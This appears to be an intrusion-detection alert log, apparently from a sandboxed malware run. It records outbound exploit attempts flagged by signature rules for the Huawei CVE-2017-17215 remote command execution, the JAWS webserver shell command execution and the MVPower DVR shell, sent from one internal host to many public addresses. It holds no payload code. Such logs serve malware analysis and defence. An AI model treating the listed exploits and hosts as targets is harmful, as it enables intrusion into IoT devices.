                            06/10/24-15:37:59.767523TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6012680192.168.2.1388.157.63.21
                            06/10/24-15:38:02.660067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088237215192.168.2.1341.178.84.39
                            06/10/24-15:38:02.836583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306437215192.168.2.13156.2.52.209
                            06/10/24-15:38:00.163693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015437215192.168.2.13197.176.59.104
                            06/10/24-15:38:00.004662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341437215192.168.2.13156.38.108.66
                            06/10/24-15:38:02.674620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489037215192.168.2.13197.224.191.228
                            06/10/24-15:38:00.263049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755837215192.168.2.1341.109.88.228
                            06/10/24-15:38:00.033459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641437215192.168.2.13156.115.29.3
                            06/10/24-15:38:02.121619TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5176080192.168.2.13135.204.76.26
                            06/10/24-15:38:02.763209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4393037215192.168.2.1341.218.218.29
                            06/10/24-15:37:59.762945TCP2025883ET EXPLOIT MVPower DVR Shell UCE5013480192.168.2.13102.230.19.253
                            06/10/24-15:38:00.030618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158437215192.168.2.1341.169.217.182
                            06/10/24-15:38:02.507632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061837215192.168.2.13156.211.140.83
                            06/10/24-15:38:02.771027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557037215192.168.2.13156.180.47.217
                            06/10/24-15:38:02.768716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366037215192.168.2.1341.150.135.103
                            06/10/24-15:37:59.988624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113037215192.168.2.1341.109.81.128
                            06/10/24-15:38:00.253141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248437215192.168.2.13197.229.179.187
                            06/10/24-15:38:02.851207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557237215192.168.2.13197.81.50.55
                            06/10/24-15:37:59.938715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563637215192.168.2.13197.11.121.199
                            06/10/24-15:38:02.173369TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4578080192.168.2.1396.169.78.25
                            06/10/24-15:37:59.936837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791837215192.168.2.13197.192.210.171
                            06/10/24-15:38:02.261108TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4797280192.168.2.1337.23.114.2
                            06/10/24-15:37:59.994517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980637215192.168.2.13197.99.205.156
                            06/10/24-15:38:02.754766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967637215192.168.2.13197.243.121.228
                            06/10/24-15:38:00.029895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342637215192.168.2.1341.199.166.65
                            06/10/24-15:38:02.200092TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4189680192.168.2.13211.186.230.205
                            06/10/24-15:38:02.779348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956037215192.168.2.13197.254.151.216
                            06/10/24-15:38:02.860487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408037215192.168.2.1341.39.148.204
                            06/10/24-15:37:59.795427TCP2025883ET EXPLOIT MVPower DVR Shell UCE3748880192.168.2.1386.102.128.211
                            06/10/24-15:38:00.031359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214237215192.168.2.13197.94.187.63
                            06/10/24-15:38:02.215874TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3547880192.168.2.13118.231.106.106
                            06/10/24-15:37:59.800000TCP2025883ET EXPLOIT MVPower DVR Shell UCE4201680192.168.2.13195.50.200.227
                            06/10/24-15:38:00.133538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525237215192.168.2.1341.136.197.138
                            06/10/24-15:38:02.656081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893037215192.168.2.1341.120.207.139
                            06/10/24-15:38:02.757283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443437215192.168.2.13156.248.183.47
                            06/10/24-15:37:59.831568TCP2025883ET EXPLOIT MVPower DVR Shell UCE5346280192.168.2.13220.219.206.99
                            06/10/24-15:38:02.263838TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5056680192.168.2.1323.71.76.230
                            06/10/24-15:38:02.685061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140437215192.168.2.1341.164.51.0
                            06/10/24-15:38:00.176046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153237215192.168.2.13197.127.189.142
                            06/10/24-15:37:59.827151TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5138280192.168.2.13160.158.220.221
                            06/10/24-15:37:59.934919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637837215192.168.2.13156.60.90.199
                            06/10/24-15:38:00.014911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898437215192.168.2.13156.122.137.98
                            06/10/24-15:38:00.218890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736437215192.168.2.13156.60.167.234
                            06/10/24-15:38:00.213967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810637215192.168.2.13197.144.113.129
                            06/10/24-15:38:02.258958TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3679880192.168.2.13217.134.158.53
                            06/10/24-15:38:02.735960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760837215192.168.2.13156.1.86.198
                            06/10/24-15:37:59.989479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.13197.156.129.89
                            06/10/24-15:38:00.027008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237037215192.168.2.13197.218.185.191
                            06/10/24-15:38:02.858288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996237215192.168.2.13197.135.181.98
                            06/10/24-15:37:59.923381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6088237215192.168.2.1341.1.16.245
                            06/10/24-15:38:00.169848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529637215192.168.2.13156.209.45.106
                            06/10/24-15:38:00.018435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545237215192.168.2.13197.116.197.156
                            06/10/24-15:38:02.216669TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5138680192.168.2.1375.235.225.30
                            06/10/24-15:37:59.993727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334237215192.168.2.13197.218.247.171
                            06/10/24-15:38:02.876052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700237215192.168.2.13197.80.176.118
                            06/10/24-15:38:02.804169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138637215192.168.2.1341.0.102.53
                            06/10/24-15:38:00.186850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339637215192.168.2.1341.55.41.178
                            06/10/24-15:38:00.217260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138437215192.168.2.13156.203.151.228
                            06/10/24-15:38:02.852405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495637215192.168.2.1341.155.99.209
                            06/10/24-15:38:00.131221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810237215192.168.2.1341.41.194.38
                            06/10/24-15:37:59.815835TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5377680192.168.2.1378.199.201.121
                            06/10/24-15:38:00.268899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641637215192.168.2.13197.63.12.46
                            06/10/24-15:38:02.727944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468437215192.168.2.1341.17.67.8
                            06/10/24-15:38:02.864253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711237215192.168.2.13156.213.216.105
                            06/10/24-15:37:59.774510TCP2025883ET EXPLOIT MVPower DVR Shell UCE5412880192.168.2.13115.56.153.54
                            06/10/24-15:38:02.209224TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3922080192.168.2.13108.217.14.73
                            06/10/24-15:38:02.667443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650437215192.168.2.13197.126.48.116
                            06/10/24-15:38:00.026295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302037215192.168.2.13156.253.209.134
                            06/10/24-15:38:02.789775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124037215192.168.2.1341.86.51.96
                            06/10/24-15:38:02.844763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589837215192.168.2.13197.40.65.61
                            06/10/24-15:38:00.039203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664237215192.168.2.1341.205.70.44
                            06/10/24-15:38:02.722392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236837215192.168.2.1341.222.92.212
                            06/10/24-15:38:02.158562TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5027080192.168.2.13109.89.84.87
                            06/10/24-15:38:02.671087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527437215192.168.2.13156.196.121.47
                            06/10/24-15:38:02.842261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967637215192.168.2.13197.35.23.215
                            06/10/24-15:38:02.208033TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4438480192.168.2.1344.130.63.92
                            06/10/24-15:37:59.750933TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3567480192.168.2.13151.218.172.48
                            06/10/24-15:37:59.779104TCP2025883ET EXPLOIT MVPower DVR Shell UCE5922080192.168.2.1332.111.100.187
                            06/10/24-15:37:59.811339TCP2025883ET EXPLOIT MVPower DVR Shell UCE5438080192.168.2.13167.251.162.140
                            06/10/24-15:38:00.192522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817237215192.168.2.13156.168.245.29
                            06/10/24-15:38:00.201993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446437215192.168.2.13197.63.251.49
                            06/10/24-15:38:02.094682TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4115680192.168.2.13116.139.9.42
                            06/10/24-15:38:02.749574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522437215192.168.2.13197.93.109.120
                            06/10/24-15:38:00.160015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446837215192.168.2.13156.134.62.117
                            06/10/24-15:38:00.172951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767837215192.168.2.1341.13.119.15
                            06/10/24-15:38:00.251690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174037215192.168.2.13156.89.192.95
                            06/10/24-15:38:00.036323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070237215192.168.2.13156.238.163.110
                            06/10/24-15:38:02.144369TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4814480192.168.2.13124.6.22.152
                            06/10/24-15:37:59.947535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989437215192.168.2.13197.56.205.250
                            06/10/24-15:38:02.139383TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3560480192.168.2.13119.69.66.111
                            06/10/24-15:38:02.916548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015637215192.168.2.13156.113.136.169
                            06/10/24-15:38:02.184257TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5418080192.168.2.13157.18.104.206
                            06/10/24-15:38:02.873305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562437215192.168.2.13197.190.134.35
                            06/10/24-15:37:59.758232TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4343480192.168.2.1357.244.132.164
                            06/10/24-15:37:59.976497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493237215192.168.2.13197.9.107.34
                            06/10/24-15:38:02.511176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627437215192.168.2.1341.179.65.119
                            06/10/24-15:38:02.845835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859437215192.168.2.13156.142.47.5
                            06/10/24-15:38:00.198032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454437215192.168.2.13197.181.198.133
                            06/10/24-15:37:59.852064TCP2025883ET EXPLOIT MVPower DVR Shell UCE4599480192.168.2.13120.127.248.215
                            06/10/24-15:38:00.228570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.13197.100.180.103
                            06/10/24-15:38:00.274773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467837215192.168.2.1341.14.173.139
                            06/10/24-15:38:02.748143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895437215192.168.2.1341.242.83.117
                            06/10/24-15:37:59.856619TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4356080192.168.2.1324.223.44.225
                            06/10/24-15:38:00.232831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349437215192.168.2.13197.159.198.51
                            06/10/24-15:37:59.986004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301637215192.168.2.13156.32.124.85
                            06/10/24-15:38:02.146535TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3640080192.168.2.1372.99.239.26
                            06/10/24-15:37:59.840660TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3390080192.168.2.1337.242.196.25
                            06/10/24-15:38:02.818643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005437215192.168.2.13197.80.0.140
                            06/10/24-15:38:02.662261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949037215192.168.2.13197.173.181.199
                            06/10/24-15:38:02.505632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227637215192.168.2.1341.70.83.42
                            06/10/24-15:38:02.181411TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3563880192.168.2.13105.54.97.51
                            06/10/24-15:38:02.910934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750437215192.168.2.13197.148.228.103
                            06/10/24-15:38:02.733766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.13197.67.106.155
                            06/10/24-15:38:00.167791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970237215192.168.2.13156.123.237.221
                            06/10/24-15:37:59.960374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603437215192.168.2.1341.66.186.65
                            06/10/24-15:37:59.824955TCP2025883ET EXPLOIT MVPower DVR Shell UCE4806880192.168.2.13189.244.26.215
                            06/10/24-15:38:00.185349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022037215192.168.2.1341.94.153.112
                            06/10/24-15:38:00.009869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296637215192.168.2.1341.45.237.96
                            06/10/24-15:38:02.511832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016637215192.168.2.1341.124.203.218
                            06/10/24-15:38:02.710308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012837215192.168.2.1341.228.119.118
                            06/10/24-15:38:02.499468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164237215192.168.2.1341.186.51.90
                            06/10/24-15:37:59.946836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348237215192.168.2.13156.82.1.213
                            06/10/24-15:37:59.873252TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5273680192.168.2.1396.171.224.255
                            06/10/24-15:38:02.718331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142237215192.168.2.13197.19.66.134
                            06/10/24-15:38:02.743038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657037215192.168.2.1341.43.111.177
                            06/10/24-15:38:02.809845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462437215192.168.2.1341.205.156.248
                            06/10/24-15:37:59.820455TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4850280192.168.2.13145.193.92.118
                            06/10/24-15:38:02.209869TCP2025883ET EXPLOIT MVPower DVR Shell UCE4061480192.168.2.1382.111.112.237
                            06/10/24-15:38:02.675728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381437215192.168.2.1341.205.27.222
                            06/10/24-15:38:00.180724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561637215192.168.2.1341.124.122.69
                            06/10/24-15:37:59.765229TCP2025883ET EXPLOIT MVPower DVR Shell UCE4595680192.168.2.1320.2.48.78
                            06/10/24-15:38:00.241407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919837215192.168.2.13156.178.159.128
                            06/10/24-15:38:02.783251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956237215192.168.2.13156.229.89.182
                            06/10/24-15:38:02.686166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268637215192.168.2.13156.141.138.41
                            06/10/24-15:38:02.083314TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3583480192.168.2.1375.46.147.180
                            06/10/24-15:38:02.752803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726437215192.168.2.13197.69.40.39
                            06/10/24-15:38:00.253813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307837215192.168.2.13156.243.212.25
                            06/10/24-15:38:00.256609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290637215192.168.2.13156.172.0.85
                            06/10/24-15:38:00.254476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605837215192.168.2.1341.214.194.245
                            06/10/24-15:38:02.249310TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4959480192.168.2.13153.175.107.60
                            06/10/24-15:38:02.101239TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6059480192.168.2.139.187.220.248
                            06/10/24-15:37:59.922412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911037215192.168.2.13156.143.243.166
                            06/10/24-15:37:59.968821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.13156.27.221.22
                            06/10/24-15:37:59.783784TCP2025883ET EXPLOIT MVPower DVR Shell UCE3921880192.168.2.139.203.151.161
                            06/10/24-15:38:02.770031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578237215192.168.2.1341.101.121.169
                            06/10/24-15:38:02.875172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563637215192.168.2.13197.94.37.133
                            06/10/24-15:38:02.934901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410237215192.168.2.13156.104.219.208
                            06/10/24-15:38:02.787074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639237215192.168.2.13156.2.80.141
                            06/10/24-15:38:00.006377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557237215192.168.2.13197.67.118.32
                            06/10/24-15:38:00.242237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.1341.188.47.47
                            06/10/24-15:38:02.512532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481637215192.168.2.13156.214.52.148
                            06/10/24-15:38:02.231111TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4168880192.168.2.13161.82.119.218
                            06/10/24-15:38:00.236295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542837215192.168.2.13156.103.207.1
                            06/10/24-15:38:00.027699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509637215192.168.2.1341.59.124.13
                            06/10/24-15:38:02.224313TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4152480192.168.2.1380.48.225.205
                            06/10/24-15:38:02.230506TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4236280192.168.2.1313.177.39.90
                            06/10/24-15:38:02.817519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056037215192.168.2.13197.136.229.6
                            06/10/24-15:38:02.753767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297037215192.168.2.1341.102.226.8
                            06/10/24-15:38:02.745716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560437215192.168.2.13197.100.179.179
                            06/10/24-15:38:02.823755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966637215192.168.2.13156.35.194.89
                            06/10/24-15:38:02.825900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658837215192.168.2.13197.48.146.219
                            06/10/24-15:38:02.096206TCP2025883ET EXPLOIT MVPower DVR Shell UCE3551680192.168.2.13118.208.232.79
                            06/10/24-15:38:00.220635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465437215192.168.2.13156.16.252.113
                            06/10/24-15:38:02.487616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816037215192.168.2.13156.76.237.97
                            06/10/24-15:38:02.822383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427837215192.168.2.13197.207.208.126
                            06/10/24-15:37:59.760581TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3587280192.168.2.13194.55.24.22
                            06/10/24-15:38:02.767730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989037215192.168.2.13197.148.119.5
                            06/10/24-15:38:02.114191TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5902280192.168.2.13145.29.230.140
                            06/10/24-15:38:02.926997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.13197.184.123.16
                            06/10/24-15:37:59.786107TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4024680192.168.2.1396.121.230.115
                            06/10/24-15:38:02.681567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532837215192.168.2.1341.9.208.117
                            06/10/24-15:38:02.847965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643637215192.168.2.13156.234.121.196
                            06/10/24-15:38:02.159854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4632880192.168.2.13221.87.106.132
                            06/10/24-15:37:59.998646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966237215192.168.2.13197.50.100.135
                            06/10/24-15:38:02.920636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788637215192.168.2.13197.184.200.60
                            06/10/24-15:38:02.764373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325437215192.168.2.13156.81.150.33
                            06/10/24-15:38:00.229452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239037215192.168.2.13156.192.233.189
                            06/10/24-15:38:02.835522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.13156.30.176.173
                            06/10/24-15:38:00.034890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474237215192.168.2.13156.230.39.62
                            06/10/24-15:38:02.784346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909837215192.168.2.13156.138.11.171
                            06/10/24-15:37:59.967169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660237215192.168.2.13197.230.194.3
                            06/10/24-15:37:59.982567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062037215192.168.2.1341.144.136.243
                            06/10/24-15:38:02.682611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339437215192.168.2.13156.208.52.212
                            06/10/24-15:37:59.793177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5284280192.168.2.13181.232.47.252
                            06/10/24-15:38:00.179963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4454237215192.168.2.1341.167.61.202
                            06/10/24-15:38:02.919148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464637215192.168.2.13197.188.36.80
                            06/10/24-15:38:02.924570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723437215192.168.2.13156.82.178.96
                            06/10/24-15:38:00.225874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048637215192.168.2.13197.25.198.155
                            06/10/24-15:38:00.038461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109237215192.168.2.13197.21.231.68
                            06/10/24-15:38:00.264605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861037215192.168.2.13156.7.198.77
                            06/10/24-15:38:02.088585TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4253280192.168.2.13181.95.234.17
                            06/10/24-15:38:00.246351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115037215192.168.2.1341.234.210.66
                            06/10/24-15:38:02.805331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788437215192.168.2.13156.239.33.211
                            06/10/24-15:38:02.824797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945037215192.168.2.1341.91.3.35
                            06/10/24-15:37:59.939523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676837215192.168.2.1341.92.127.129
                            06/10/24-15:37:59.940258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962637215192.168.2.13197.53.161.229
                            06/10/24-15:37:59.953764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868437215192.168.2.13197.252.226.228
                            06/10/24-15:38:00.204323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556437215192.168.2.1341.168.73.24
